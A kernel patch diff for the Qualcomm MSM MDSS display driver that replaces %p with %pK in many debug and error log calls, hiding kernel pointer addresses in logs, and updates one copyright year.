-@@ -307,7 +307,7 @@ static int __compat_atomic_commit(struct fb_info *info, unsigned int cmd,
- ret = copy_from_user(&commit32, (void __user *)argp,
- sizeof(struct mdp_layer_commit32));
- if (ret) {
-- pr_err("%s:copy_from_user failed, ptr %p\n", __func__,
-+ pr_err("%s:copy_from_user failed, ptr %pK\n", __func__,
- (void __user *)argp);
- ret = -EFAULT;
- return ret;
-@@ -325,7 +325,7 @@ static int __compat_atomic_commit(struct fb_info *info, unsigned int cmd,
- compat_ptr(commit32.commit_v1.output_layer),
- buffer_size);
- if (ret) {
-- pr_err("fail to copy output layer
from user, ptr %p\n",
-+ pr_err("fail to copy output layer from user, ptr %pK\n",
- compat_ptr(commit32.commit_v1.output_layer));
- ret = -EFAULT;
- goto layer_list_err;
-@@ -3418,7 +3418,7 @@ static int __copy_layer_igc_lut_data_v1_7(
- cfg_payload32,
- sizeof(struct mdp_igc_lut_data_v1_7_32));
- if (ret) {
-- pr_err("copy from user failed, IGC cfg payload = %p\n",
-+ pr_err("copy from user failed, IGC cfg payload = %pK\n",
- cfg_payload32);
- ret = -EFAULT;
- goto exit;
-@@ -3493,7 +3493,7 @@ static int __copy_layer_hist_lut_data_v1_7(
- cfg_payload32,
- sizeof(struct mdp_hist_lut_data_v1_7_32));
- if (ret) {
-- pr_err("copy from user failed, hist lut cfg_payload = %p\n",
-+ pr_err("copy from user failed, hist lut cfg_payload = %pK\n",
- cfg_payload32);
- ret = -EFAULT;
- goto exit;
-@@ -3565,7 +3565,7 @@ static int __copy_layer_pa_data_v1_7(
- cfg_payload32,
- sizeof(struct mdp_pa_data_v1_7_32));
- if (ret) {
-- pr_err("copy from user failed, pa cfg_payload = %p\n",
-+ pr_err("copy from user failed, pa cfg_payload = %pK\n",
- cfg_payload32);
- ret = -EFAULT;
- goto exit;
-@@ -3707,7 +3707,7 @@ static int __copy_layer_pp_info_pcc_params(
- compat_ptr(pp_info32->pcc_cfg_data.cfg_payload),
- sizeof(struct mdp_pcc_data_v1_7));
- if (ret) {
-- pr_err("compat copy of PCC cfg payload failed, ptr %p\n",
-+ pr_err("compat copy of PCC cfg payload failed, ptr %pK\n",
- compat_ptr(
- pp_info32->pcc_cfg_data.cfg_payload));
- ret = -EFAULT;
-@@ -3741,7 +3741,7 @@ static int __copy_layer_pp_info_params(struct mdp_input_layer *layer,
- compat_ptr(layer32->pp_info),
- sizeof(struct mdp_overlay_pp_params32));
- if (ret) {
-- pr_err("pp info copy from user failed, pp_info %p\n",
-+ pr_err("pp info copy from user failed, pp_info %pK\n",
- compat_ptr(layer32->pp_info));
- ret = -EFAULT;
- goto exit;
-diff --git a/drivers/video/msm/mdss/mdss_debug.c b/drivers/video/msm/mdss/mdss_debug.c
-index a16063b..a2912e6 100644
---- a/drivers/video/msm/mdss/mdss_debug.c
-+++
b/drivers/video/msm/mdss/mdss_debug.c
-@@ -1317,7 +1317,7 @@ static inline struct mdss_mdp_misr_map *mdss_misr_get_map(u32 block_id,
- return NULL;
- }
-
-- pr_debug("MISR Module(%d) CTRL(0x%x) SIG(0x%x) intf_base(0x%p)\n",
-+ pr_debug("MISR Module(%d) CTRL(0x%x) SIG(0x%x) intf_base(0x%pK)\n",
- block_id, map->ctrl_reg, map->value_reg, intf_base);
- return map;
- }
-@@ -1360,7 +1360,7 @@ int mdss_misr_set(struct mdss_data_type *mdata,
- bool use_mdp_up_misr = false;
-
- if (!mdata || !req || !ctl) {
-- pr_err("Invalid input params: mdata = %p req = %p ctl = %p",
-+ pr_err("Invalid input params: mdata = %pK req = %pK ctl = %pK",
- mdata, req, ctl);
- return -EINVAL;
- }
-diff --git a/drivers/video/msm/mdss/mdss_debug_xlog.c b/drivers/video/msm/mdss/mdss_debug_xlog.c
-index c9a4073..795ff55 100644
---- a/drivers/video/msm/mdss/mdss_debug_xlog.c
-+++ b/drivers/video/msm/mdss/mdss_debug_xlog.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -253,7 +253,7 @@ static void mdss_dump_debug_bus(u32 bus_dump_flag,
-
- if (*dump_mem) {
- dump_addr = *dump_mem;
-- pr_info("%s: start_addr:0x%p end_addr:0x%p\n",
-+ pr_info("%s: start_addr:0x%pK end_addr:0x%pK\n",
- __func__, dump_addr, dump_addr + list_size);
- } else {
- in_mem = false;
-@@ -371,7 +371,7 @@ static void mdss_dump_vbif_debug_bus(u32 bus_dump_flag,
-
- if (*dump_mem) {
- dump_addr = *dump_mem;
-- pr_info("%s: start_addr:0x%p end_addr:0x%p\n",
-+ pr_info("%s: start_addr:0x%pK end_addr:0x%pK\n",
- __func__, dump_addr, dump_addr + list_size);
- } else {
- in_mem = false;
-@@ -431,7 +431,7 @@ static void mdss_dump_reg(const char *dump_name, u32 reg_dump_flag,
-
- if (*dump_mem) {
- dump_addr = *dump_mem;
-- pr_info("%s: start_addr:0x%p end_addr:0x%p reg_addr=0x%p\n",
-+ pr_info("%s: start_addr:0x%pK end_addr:0x%pK reg_addr=0x%pK\n",
- dump_name, dump_addr, dump_addr + (u32)len * 16,
- addr);
- } else {
-@@ -450,7 +450,7 @@ static void mdss_dump_reg(const char *dump_name, u32 reg_dump_flag,
- xc = readl_relaxed(addr+0xc);
-
- if (in_log)
-- pr_info("%p : %08x %08x %08x %08x\n", addr, x0, x4, x8,
-+ pr_info("%pK : %08x %08x %08x %08x\n", addr, x0, x4, x8,
- xc);
-
- if (dump_addr && in_mem) {
-@@ -486,7 +486,7 @@ static void mdss_dump_reg_by_ranges(struct mdss_debug_base *dbg,
- len = get_dump_range(&xlog_node->offset,
- dbg->max_offset);
- addr = dbg->base + xlog_node->offset.start;
-- pr_debug("%s: range_base=0x%p start=0x%x end=0x%x\n",
-+ pr_debug("%s: range_base=0x%pK start=0x%x end=0x%x\n",
- xlog_node->range_name,
- addr, xlog_node->offset.start,
- xlog_node->offset.end);
-@@ -496,7 +496,7 @@ static void mdss_dump_reg_by_ranges(struct mdss_debug_base *dbg,
- } else {
- /* If there is no list to dump ranges, dump all registers */
- pr_info("Ranges not found, will dump full registers");
--
pr_info("base:0x%p len:0x%zu\n", dbg->base, dbg->max_offset);
-+ pr_info("base:0x%pK len:0x%zu\n", dbg->base, dbg->max_offset);
- addr = dbg->base;
- len = dbg->max_offset;
- mdss_dump_reg((const char *)dbg->name, reg_dump_flag, addr,
-diff --git a/drivers/video/msm/mdss/mdss_dsi.c b/drivers/video/msm/mdss/mdss_dsi.c
-index a39d2f3..6933388 100644
---- a/drivers/video/msm/mdss/mdss_dsi.c
-+++ b/drivers/video/msm/mdss/mdss_dsi.c
-@@ -1185,7 +1185,7 @@ static int mdss_dsi_off(struct mdss_panel_data *pdata, int power_state)
- mutex_lock(&ctrl_pdata->mutex);
- panel_info = &ctrl_pdata->panel_data.panel_info;
-
-- pr_debug("%s+: ctrl=%p ndx=%d power_state=%d\n",
-+ pr_debug("%s+: ctrl=%pK ndx=%d power_state=%d\n",
- __func__, ctrl_pdata, ctrl_pdata->ndx, power_state);
-
- if (power_state == panel_info->panel_power_state) {
-@@ -1369,7 +1369,7 @@ int mdss_dsi_on(struct mdss_panel_data *pdata)
- mdss_dsi_validate_debugfs_info(ctrl_pdata);
-
- cur_power_state = pdata->panel_info.panel_power_state;
-- pr_debug("%s+: ctrl=%p ndx=%d cur_power_state=%d\n", __func__,
-+ pr_debug("%s+: ctrl=%pK ndx=%d cur_power_state=%d\n", __func__,
- ctrl_pdata, ctrl_pdata->ndx, cur_power_state);
-
- pinfo = &pdata->panel_info;
-@@ -1547,7 +1547,7 @@ static int mdss_dsi_unblank(struct mdss_panel_data *pdata)
- panel_data);
- mipi = &pdata->panel_info.mipi;
-
-- pr_debug("%s+: ctrl=%p ndx=%d cur_power_state=%d ctrl_state=%x\n",
-+ pr_debug("%s+: ctrl=%pK ndx=%d cur_power_state=%d ctrl_state=%x\n",
- __func__, ctrl_pdata, ctrl_pdata->ndx,
- pdata->panel_info.panel_power_state, ctrl_pdata->ctrl_state);
-
-@@ -1618,7 +1618,7 @@ static int mdss_dsi_blank(struct mdss_panel_data *pdata, int power_state)
- panel_data);
- mipi = &pdata->panel_info.mipi;
-
-- pr_debug("%s+: ctrl=%p ndx=%d power_state=%d\n",
-+ pr_debug("%s+: ctrl=%pK ndx=%d power_state=%d\n",
- __func__, ctrl_pdata, ctrl_pdata->ndx, power_state);
-
- mdss_dsi_clk_ctrl(ctrl_pdata, ctrl_pdata->dsi_clk_handle,
-@@ -1687,7 +1687,7 @@ static
int mdss_dsi_post_panel_on(struct mdss_panel_data *pdata)
- ctrl_pdata = container_of(pdata, struct mdss_dsi_ctrl_pdata,
- panel_data);
-
-- pr_debug("%s+: ctrl=%p ndx=%d\n", __func__,
-+ pr_debug("%s+: ctrl=%pK ndx=%d\n", __func__,
- ctrl_pdata, ctrl_pdata->ndx);
-
- mdss_dsi_clk_ctrl(ctrl_pdata, ctrl_pdata->dsi_clk_handle,
-@@ -1721,7 +1721,7 @@ int mdss_dsi_cont_splash_on(struct mdss_panel_data *pdata)
- ctrl_pdata = container_of(pdata, struct mdss_dsi_ctrl_pdata,
- panel_data);
-
-- pr_debug("%s+: ctrl=%p ndx=%d\n", __func__,
-+ pr_debug("%s+: ctrl=%pK ndx=%d\n", __func__,
- ctrl_pdata, ctrl_pdata->ndx);
-
- WARN((ctrl_pdata->ctrl_state & CTRL_STATE_PANEL_INIT),
-@@ -2998,8 +2998,8 @@ static int mdss_dsi_get_bridge_chip_params(struct mdss_panel_info *pinfo,
- u32 temp_val = 0;
-
- if (!ctrl_pdata || !pdev || !pinfo) {
-- pr_err("%s: Invalid Params ctrl_pdata=%p, pdev=%p\n", __func__,
-- ctrl_pdata, pdev);
-+ pr_err("%s: Invalid Params ctrl_pdata=%pK, pdev=%pK\n",
-+ __func__, ctrl_pdata, pdev);
- rc = -EINVAL;
- goto end;
- }
-@@ -3321,7 +3321,7 @@ static int mdss_dsi_res_init(struct platform_device *pdev)
- mdss_dsi_res->shared_data = devm_kzalloc(&pdev->dev,
- sizeof(struct dsi_shared_data),
- GFP_KERNEL);
-- pr_debug("%s Allocated shared_data=%p\n", __func__,
-+ pr_debug("%s Allocated shared_data=%pK\n", __func__,
- mdss_dsi_res->shared_data);
- if (!mdss_dsi_res->shared_data) {
- pr_err("%s Unable to alloc mem for shared_data\n",
-@@ -3386,7 +3386,7 @@ static int mdss_dsi_res_init(struct platform_device *pdev)
- rc = -ENOMEM;
- goto mem_fail;
- }
-- pr_debug("%s Allocated ctrl_pdata[%d]=%p\n",
-+ pr_debug("%s Allocated ctrl_pdata[%d]=%pK\n",
- __func__, i, mdss_dsi_res->ctrl_pdata[i]);
- mdss_dsi_res->ctrl_pdata[i]->shared_data =
- mdss_dsi_res->shared_data;
-@@ -3396,7 +3396,7 @@ static int mdss_dsi_res_init(struct platform_device *pdev)
- }
-
- mdss_dsi_res->pdev = pdev;
-- pr_debug("%s: Setting up mdss_dsi_res=%p\n", __func__, mdss_dsi_res);
-+
pr_debug("%s: Setting up mdss_dsi_res=%pK\n", __func__, mdss_dsi_res);
-
- return 0;
-
-@@ -3723,11 +3723,11 @@ int mdss_dsi_retrieve_ctrl_resources(struct platform_device *pdev, int mode,
- pr_debug("%s:%d unable to remap dsi phy regulator resources\n",
- __func__, __LINE__);
- else
-- pr_info("%s: phy_regulator_base=%p phy_regulator_size=%x\n",
-+ pr_info("%s: phy_regulator_base=%pK phy_regulator_size=%x\n",
- __func__, ctrl->phy_regulator_io.base,
- ctrl->phy_regulator_io.len);
-
-- pr_info("%s: ctrl_base=%p ctrl_size=%x phy_base=%p phy_size=%x\n",
-+ pr_info("%s: ctrl_base=%pK ctrl_size=%x phy_base=%pK phy_size=%x\n",
- __func__, ctrl->ctrl_base, ctrl->reg_size, ctrl->phy_io.base,
- ctrl->phy_io.len);
-
-@@ -3871,7 +3871,7 @@ static int mdss_dsi_parse_ctrl_params(struct platform_device *ctrl_pdev,
- data = of_get_property(ctrl_pdev->dev.of_node,
- "qcom,display-id", &len);
- if (!data || len <= 0)
-- pr_err("%s:%d Unable to read qcom,display-id, data=%p,len=%d\n",
-+ pr_err("%s:%d Unable to read qcom,display-id, data=%pK,len=%d\n",
- __func__, __LINE__, data, len);
- else
- snprintf(ctrl_pdata->panel_data.panel_info.display_id,
-diff --git a/drivers/video/msm/mdss/mdss_dsi_clk.c b/drivers/video/msm/mdss/mdss_dsi_clk.c
-index bac8391..e92f6df 100644
---- a/drivers/video/msm/mdss/mdss_dsi_clk.c
-+++ b/drivers/video/msm/mdss/mdss_dsi_clk.c
-@@ -732,7 +732,7 @@ int mdss_dsi_clk_req_state(void *client, enum mdss_dsi_clk_type clk,
-
- if (!client || !clk || clk > (MDSS_DSI_CORE_CLK | MDSS_DSI_LINK_CLK) ||
- state > MDSS_DSI_CLK_EARLY_GATE) {
-- pr_err("Invalid params, client = %p, clk = 0x%x, state = %d\n",
-+ pr_err("Invalid params, client = %pK, clk = 0x%x, state = %d\n",
- client, clk, state);
- return -EINVAL;
- }
-@@ -830,7 +830,7 @@ int mdss_dsi_clk_set_link_rate(void *client, enum mdss_dsi_link_clk_type clk,
- struct mdss_dsi_clk_mngr *mngr;
-
- if (!client || (clk > MDSS_DSI_LINK_CLK_MAX)) {
-- pr_err("Invalid params, client = %p, clk = 0x%x", client, clk);
-+ pr_err("Invalid params, client = %pK, clk = 0x%x", client, clk);
- return -EINVAL;
- }
-
-@@ -929,7 +929,7 @@ int mdss_dsi_clk_force_toggle(void *client, u32 clk)
- struct mdss_dsi_clk_mngr *mngr;
-
- if (!client || !clk || clk >= MDSS_DSI_CLKS_MAX) {
-- pr_err("Invalid params, client = %p, clk = 0x%x\n",
-+ pr_err("Invalid params, client = %pK, clk = 0x%x\n",
- client, clk);
- return -EINVAL;
- }
-diff --git a/drivers/video/msm/mdss/mdss_dsi_host.c b/drivers/video/msm/mdss/mdss_dsi_host.c
-index 66bbff5..f6fbd66 100644
---- a/drivers/video/msm/mdss/mdss_dsi_host.c
-+++ b/drivers/video/msm/mdss/mdss_dsi_host.c
-@@ -102,7 +102,7 @@ void mdss_dsi_ctrl_init(struct device *ctrl_dev,
- if (ctrl->mdss_util->register_irq(ctrl->dsi_hw))
- pr_err("%s: mdss_register_irq failed.\n", __func__);
-
-- pr_debug("%s: ndx=%d base=%p\n", __func__, ctrl->ndx, ctrl->ctrl_base);
-+ pr_debug("%s: ndx=%d base=%pK\n", __func__, ctrl->ndx, ctrl->ctrl_base);
-
- init_completion(&ctrl->dma_comp);
- init_completion(&ctrl->mdp_comp);
-diff --git a/drivers/video/msm/mdss/mdss_dsi_panel.c b/drivers/video/msm/mdss/mdss_dsi_panel.c
-index 2428af7..06dc0ec 100644
---- a/drivers/video/msm/mdss/mdss_dsi_panel.c
-+++ b/drivers/video/msm/mdss/mdss_dsi_panel.c
-@@ -721,7 +721,7 @@ static int mdss_dsi_post_panel_on(struct mdss_panel_data *pdata)
- ctrl = container_of(pdata, struct mdss_dsi_ctrl_pdata,
- panel_data);
-
-- pr_debug("%s: ctrl=%p ndx=%d\n", __func__, ctrl, ctrl->ndx);
-+ pr_debug("%s: ctrl=%pK ndx=%d\n", __func__, ctrl, ctrl->ndx);
-
- pinfo = &pdata->panel_info;
- if (pinfo->dcs_cmd_by_left && ctrl->ndx != DSI_CTRL_LEFT)
-@@ -760,7 +760,7 @@ static int mdss_dsi_panel_off(struct mdss_panel_data *pdata)
- ctrl = container_of(pdata, struct mdss_dsi_ctrl_pdata,
- panel_data);
-
-- pr_debug("%s: ctrl=%p ndx=%d\n", __func__, ctrl, ctrl->ndx);
-+ pr_debug("%s: ctrl=%pK ndx=%d\n", __func__, ctrl, ctrl->ndx);
-
- if (pinfo->dcs_cmd_by_left) {
- if (ctrl->ndx != DSI_CTRL_LEFT)
-@@ -795,7 +795,7 @@
static int mdss_dsi_panel_low_power_config(struct mdss_panel_data *pdata,
- ctrl = container_of(pdata, struct mdss_dsi_ctrl_pdata,
- panel_data);
-
-- pr_debug("%s: ctrl=%p ndx=%d enable=%d\n", __func__, ctrl, ctrl->ndx,
-+ pr_debug("%s: ctrl=%pK ndx=%d enable=%d\n", __func__, ctrl, ctrl->ndx,
- enable);
-
- /* Any panel specific low power commands/config */
-@@ -2066,7 +2066,7 @@ static int mdss_dsi_panel_timing_from_dt(struct device_node *np,
-
- if (np->name) {
- pt->timing.name = kstrdup(np->name, GFP_KERNEL);
-- pr_info("%s: found new timing \"%s\" (%p)\n", __func__,
-+ pr_info("%s: found new timing \"%s\" (%pK)\n", __func__,
- np->name, &pt->timing);
- }
-
-@@ -2400,7 +2400,7 @@ static int mdss_panel_parse_dt(struct device_node *np,
- bridge_chip_name = of_get_property(np,
- "qcom,bridge-name", &len);
- if (!bridge_chip_name || len <= 0) {
-- pr_err("%s:%d Unable to read qcom,bridge_name, data=%p,len=%d\n",
-+ pr_err("%s:%d Unable to read qcom,bridge_name, data=%pK,len=%d\n",
- __func__, __LINE__, bridge_chip_name, len);
- rc = -EINVAL;
- goto error;
-diff --git a/drivers/video/msm/mdss/mdss_fb.c b/drivers/video/msm/mdss/mdss_fb.c
-index 570471d..3b68ee2 100644
---- a/drivers/video/msm/mdss/mdss_fb.c
-+++ b/drivers/video/msm/mdss/mdss_fb.c
-@@ -2029,7 +2029,7 @@ int mdss_fb_alloc_fb_ion_memory(struct msm_fb_data_type *mfd, size_t fb_size)
- rc = PTR_ERR(vaddr);
- goto err_unmap;
- }
-- pr_debug("alloc 0x%zuB vaddr = %p for fb%d\n", fb_size,
-+ pr_debug("alloc 0x%zuB vaddr = %pK for fb%d\n", fb_size,
- vaddr, mfd->index);
-
- mfd->fbi->screen_base = (char *) vaddr;
-@@ -2128,7 +2128,7 @@ static int mdss_fb_fbmem_ion_mmap(struct fb_info *info,
- vma->vm_page_prot =
- pgprot_writecombine(vma->vm_page_prot);
-
-- pr_debug("vma=%p, addr=%x len=%ld\n",
-+ pr_debug("vma=%pK, addr=%x len=%ld\n",
- vma, (unsigned int)addr, len);
- pr_debug("vm_start=%x vm_end=%x vm_page_prot=%ld\n",
- (unsigned int)vma->vm_start,
-@@ -2295,7 +2295,7 @@ static int
mdss_fb_alloc_fbmem_iommu(struct msm_fb_data_type *mfd, int dom)
- return -ERANGE;
- }
-
-- pr_debug("alloc 0x%zxB @ (%pa phys) (0x%p virt) (%pa iova) for fb%d\n",
-+ pr_debug("alloc 0x%zxB @ (%pa phys) (0x%pK virt) (%pa iova) for fb%d\n",
- size, &phys, virt, &mfd->iova, mfd->index);
-
- mfd->fbi->screen_base = virt;
-@@ -2583,7 +2583,7 @@ static int mdss_fb_open(struct fb_info *info, int user)
- }
-
- mfd->ref_cnt++;
-- pr_debug("mfd refcount:%d file:%p\n", mfd->ref_cnt, info->file);
-+ pr_debug("mfd refcount:%d file:%pK\n", mfd->ref_cnt, info->file);
-
- return 0;
-
-@@ -2648,7 +2648,7 @@ static int mdss_fb_release_all(struct fb_info *info, bool release_all)
- pr_warn("file node not found or wrong ref cnt: release all:%d refcnt:%d\n",
- release_all, mfd->ref_cnt);
-
-- pr_debug("current process=%s pid=%d mfd->ref=%d file:%p\n",
-+ pr_debug("current process=%s pid=%d mfd->ref=%d file:%pK\n",
- task->comm, current->tgid, mfd->ref_cnt, info->file);
-
- if (!mfd->ref_cnt || release_all) {
-@@ -4242,7 +4242,7 @@ static int mdss_fb_atomic_commit_ioctl(struct fb_info *info,
- ret = copy_from_user(scale, layer->scale,
- sizeof(struct mdp_scale_data));
- if (ret) {
-- pr_err("layer list copy from user failed, scale = %p\n",
-+ pr_err("layer list copy from user failed, scale = %pK\n",
- layer->scale);
- kfree(scale);
- scale = NULL;
-diff --git a/drivers/video/msm/mdss/mdss_hdmi_tx.c b/drivers/video/msm/mdss/mdss_hdmi_tx.c
-index 9ce7812..b234d1e 100644
---- a/drivers/video/msm/mdss/mdss_hdmi_tx.c
-+++ b/drivers/video/msm/mdss/mdss_hdmi_tx.c
-@@ -1458,7 +1458,7 @@ static int hdmi_tx_sysfs_create(struct hdmi_tx_ctrl *hdmi_ctrl,
- return rc;
- }
- hdmi_ctrl->kobj = &fbi->dev->kobj;
-- DEV_DBG("%s: sysfs group %p\n", __func__, hdmi_ctrl->kobj);
-+ DEV_DBG("%s: sysfs group %pK\n", __func__, hdmi_ctrl->kobj);
-
- return 0;
- } /* hdmi_tx_sysfs_create */
-@@ -4790,7 +4790,7 @@ static int hdmi_tx_init_resource(struct hdmi_tx_ctrl *hdmi_ctrl)
- DEV_DBG("%s: '%s' remap failed or
not available\n",
- __func__, hdmi_tx_io_name(i));
- }
-- DEV_INFO("%s: '%s': start = 0x%p, len=0x%x\n", __func__,
-+ DEV_INFO("%s: '%s': start = 0x%pK, len=0x%x\n", __func__,
- hdmi_tx_io_name(i), pdata->io[i].base,
- pdata->io[i].len);
- }
-@@ -5298,7 +5298,7 @@ static int hdmi_tx_get_dt_data(struct platform_device *pdev,
-
- data = of_get_property(pdev->dev.of_node, "qcom,display-id", &len);
- if (!data || len <= 0)
-- pr_err("%s:%d Unable to read qcom,display-id, data=%p,len=%d\n",
-+ pr_err("%s:%d Unable to read qcom,display-id, data=%pK,len=%d\n",
- __func__, __LINE__, data, len);
- else
- snprintf(hdmi_ctrl->panel_data.panel_info.display_id,
-diff --git a/drivers/video/msm/mdss/mdss_mdp.c b/drivers/video/msm/mdss/mdss_mdp.c
-index e7301ae..2b0bcec 100644
---- a/drivers/video/msm/mdss/mdss_mdp.c
-+++ b/drivers/video/msm/mdss/mdss_mdp.c
-@@ -481,7 +481,7 @@ struct reg_bus_client *mdss_reg_bus_vote_client_create(char *client_name)
- strlcpy(client->name, client_name, MAX_CLIENT_NAME_LEN);
- client->usecase_ndx = VOTE_INDEX_DISABLE;
- client->id = id;
-- pr_debug("bus vote client %s created:%p id :%d\n", client_name,
-+ pr_debug("bus vote client %s created:%pK id :%d\n", client_name,
- client, id);
- id++;
- list_add(&client->list, &mdss_res->reg_bus_clist);
-@@ -495,7 +495,7 @@ void mdss_reg_bus_vote_client_destroy(struct reg_bus_client *client)
- if (!client) {
- pr_err("reg bus vote: invalid client handle\n");
- } else {
-- pr_debug("bus vote client %s destroyed:%p id:%u\n",
-+ pr_debug("bus vote client %s destroyed:%pK id:%u\n",
- client->name, client, client->id);
- mutex_lock(&mdss_res->reg_bus_lock);
- list_del_init(&client->list);
-@@ -1561,7 +1561,7 @@ static u32 mdss_mdp_res_init(struct mdss_data_type *mdata)
-
- mdata->iclient = msm_ion_client_create(mdata->pdev->name);
- if (IS_ERR_OR_NULL(mdata->iclient)) {
-- pr_err("msm_ion_client_create() return error (%p)\n",
-+ pr_err("msm_ion_client_create() return error (%pK)\n",
- mdata->iclient);
-
mdata->iclient = NULL;
- }
-@@ -2028,7 +2028,7 @@ static int mdss_mdp_probe(struct platform_device *pdev)
- if (rc)
- pr_debug("unable to map MDSS VBIF non-realtime base\n");
- else
-- pr_debug("MDSS VBIF NRT HW Base addr=%p len=0x%x\n",
-+ pr_debug("MDSS VBIF NRT HW Base addr=%pK len=0x%x\n",
- mdata->vbif_nrt_io.base, mdata->vbif_nrt_io.len);
-
- res = platform_get_resource(pdev, IORESOURCE_IRQ, 0);
-@@ -2923,7 +2923,7 @@ static int mdss_mdp_cdm_addr_setup(struct mdss_data_type *mdata,
- head[i].base = (mdata->mdss_io.base) + cdm_offsets[i];
- atomic_set(&head[i].kref.refcount, 0);
- mutex_init(&head[i].lock);
-- pr_debug("%s: cdm off (%d) = %p\n", __func__, i, head[i].base);
-+ pr_debug("%s: cdm off (%d) = %pK\n", __func__, i, head[i].base);
- }
-
- mdata->cdm_off = head;
-@@ -2990,7 +2990,7 @@ static int mdss_mdp_dsc_addr_setup(struct mdss_data_type *mdata,
- for (i = 0; i < len; i++) {
- head[i].num = i;
- head[i].base = (mdata->mdss_io.base) + dsc_offsets[i];
-- pr_debug("dsc off (%d) = %p\n", i, head[i].base);
-+ pr_debug("dsc off (%d) = %pK\n", i, head[i].base);
- }
-
- mdata->dsc_off = head;
-diff --git a/drivers/video/msm/mdss/mdss_mdp_intf_cmd.c b/drivers/video/msm/mdss/mdss_mdp_intf_cmd.c
-index ba13444..cd1f02b 100644
---- a/drivers/video/msm/mdss/mdss_mdp_intf_cmd.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_intf_cmd.c
-@@ -1549,7 +1549,7 @@ static int mdss_mdp_cmd_wait4pingpong(struct mdss_mdp_ctl *ctl, void *arg)
- MDSS_XLOG(ctl->num, atomic_read(&ctx->koff_cnt), ctl->roi_bkup.w,
- ctl->roi_bkup.h);
-
-- pr_debug("%s: intf_num=%d ctx=%p koff_cnt=%d\n", __func__,
-+ pr_debug("%s: intf_num=%d ctx=%pK koff_cnt=%d\n", __func__,
- ctl->intf_num, ctx, atomic_read(&ctx->koff_cnt));
-
- rc = wait_event_timeout(ctx->pp_waitq,
-@@ -1777,7 +1777,7 @@ int mdss_mdp_cmd_set_autorefresh_mode(struct mdss_mdp_ctl *mctl, int frame_cnt)
- struct mdss_panel_info *pinfo;
-
- if (!mctl || !mctl->is_master || !mctl->panel_data) {
-- pr_err("invalid ctl mctl:%p pdata:%p\n",
-+
pr_err("invalid ctl mctl:%pK pdata:%pK\n",
- mctl, mctl ? mctl->panel_data : 0);
- return -ENODEV;
- }
-@@ -2782,7 +2782,7 @@ static int mdss_mdp_cmd_ctx_setup(struct mdss_mdp_ctl *ctl,
-
- ctx->intf_stopped = 0;
-
-- pr_debug("%s: ctx=%p num=%d aux=%d\n", __func__, ctx,
-+ pr_debug("%s: ctx=%pK num=%d aux=%d\n", __func__, ctx,
- default_pp_num, aux_pp_num);
- MDSS_XLOG(ctl->num, atomic_read(&ctx->koff_cnt));
-
-diff --git a/drivers/video/msm/mdss/mdss_mdp_intf_video.c b/drivers/video/msm/mdss/mdss_mdp_intf_video.c
-index 6924e64..b0fc8fc 100644
---- a/drivers/video/msm/mdss/mdss_mdp_intf_video.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_intf_video.c
-@@ -123,7 +123,7 @@ int mdss_mdp_video_addr_setup(struct mdss_data_type *mdata,
-
- for (i = 0; i < count; i++) {
- head[i].base = mdata->mdss_io.base + offsets[i];
-- pr_debug("adding Video Intf #%d offset=0x%x virt=%p\n", i,
-+ pr_debug("adding Video Intf #%d offset=0x%x virt=%pK\n", i,
- offsets[i], head[i].base);
- head[i].ref_cnt = 0;
- head[i].intf_num = i + MDSS_MDP_INTF0;
-@@ -520,7 +520,7 @@ static int mdss_mdp_video_intfs_stop(struct mdss_mdp_ctl *ctl,
- pr_err("Intf %d not in use\n", (inum + MDSS_MDP_INTF0));
- return -ENODEV;
- }
-- pr_debug("stop ctl=%d video Intf #%d base=%p", ctl->num, ctx->intf_num,
-+ pr_debug("stop ctl=%d video Intf #%d base=%pK", ctl->num, ctx->intf_num,
- ctx->base);
-
- ret = mdss_mdp_video_ctx_stop(ctl, pinfo, ctx);
-@@ -538,7 +538,7 @@ static int mdss_mdp_video_intfs_stop(struct mdss_mdp_ctl *ctl,
- pr_err("Intf %d not in use\n", (inum + MDSS_MDP_INTF0));
- return -ENODEV;
- }
-- pr_debug("stop ctl=%d video Intf #%d base=%p", ctl->num,
-+ pr_debug("stop ctl=%d video Intf #%d base=%pK", ctl->num,
- sctx->intf_num, sctx->base);
-
- ret = mdss_mdp_video_ctx_stop(ctl, pinfo, sctx);
-@@ -1535,7 +1535,7 @@ static int mdss_mdp_video_intfs_setup(struct mdss_mdp_ctl *ctl,
- (inum + MDSS_MDP_INTF0));
- return -EBUSY;
- }
-- pr_debug("video Intf #%d base=%p", ctx->intf_num, ctx->base);
-+
pr_debug("video Intf #%d base=%pK", ctx->intf_num, ctx->base);
- ctx->ref_cnt++;
- } else {
- pr_err("Invalid intf number: %d\n", (inum + MDSS_MDP_INTF0));
-@@ -1568,7 +1568,7 @@ static int mdss_mdp_video_intfs_setup(struct mdss_mdp_ctl *ctl,
- (inum + MDSS_MDP_INTF0));
- return -EBUSY;
- }
-- pr_debug("video Intf #%d base=%p", ctx->intf_num, ctx->base);
-+ pr_debug("video Intf #%d base=%pK", ctx->intf_num, ctx->base);
- ctx->ref_cnt++;
-
- ctl->intf_ctx[SLAVE_CTX] = ctx;
-diff --git a/drivers/video/msm/mdss/mdss_mdp_layer.c b/drivers/video/msm/mdss/mdss_mdp_layer.c
-index 2e8008d..0615625 100644
---- a/drivers/video/msm/mdss/mdss_mdp_layer.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_layer.c
-@@ -446,7 +446,7 @@ static int __configure_pipe_params(struct msm_fb_data_type *mfd,
- mixer = mdss_mdp_mixer_get(mdp5_data->ctl, mixer_mux);
- pipe->src_fmt = mdss_mdp_get_format_params(layer->buffer.format);
- if (!pipe->src_fmt || !mixer) {
-- pr_err("invalid layer format:%d or mixer:%p\n",
-+ pr_err("invalid layer format:%d or mixer:%pK\n",
- layer->buffer.format, pipe->mixer_left);
- ret = -EINVAL;
- goto end;
-@@ -1354,7 +1354,7 @@ validate_exit:
- }
- } else {
- pipe->file = file;
-- pr_debug("file pointer attached with pipe is %p\n",
-+ pr_debug("file pointer attached with pipe is %pK\n",
- file);
- }
- }
-diff --git a/drivers/video/msm/mdss/mdss_mdp_overlay.c b/drivers/video/msm/mdss/mdss_mdp_overlay.c
-index 495b28f..c01968c 100644
---- a/drivers/video/msm/mdss/mdss_mdp_overlay.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_overlay.c
